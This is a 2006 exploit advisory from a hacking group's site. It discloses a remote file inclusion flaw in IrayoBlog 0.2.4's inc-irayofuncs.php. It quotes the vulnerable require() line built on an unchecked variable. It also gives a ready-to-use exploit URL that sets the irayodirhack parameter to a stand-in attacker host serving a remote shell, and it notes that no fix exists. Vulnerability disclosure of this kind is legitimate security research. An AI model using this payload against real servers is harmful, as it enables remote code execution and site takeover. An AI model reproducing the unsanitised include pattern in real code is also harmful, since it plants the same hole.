IrayoBlog 0.2.4 (inc-irayofuncs.php) Remote File Include Vulnerability

2006-11-08 00:00:00

*********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************

* Portal Name :irayoblog-alpha-0.2.4

* Class = Remote File Inclusion ;

* Download =http://ovh.dl.sourceforge.net/sourceforge/irayoblog/irayoblog-alpha-0.2.4.tar.gz

* Found by = Dr.Pantagon ([email protected])

----------------------------------------------------------------------------------------------------------
- Vulnerable Code

require($irayodirhack."/inc/configdefaults.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?



----------------------------------------------------------------------------------------------------------

Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************

#

Fixes

No fixes

In order to submit a new fix you need to be registered.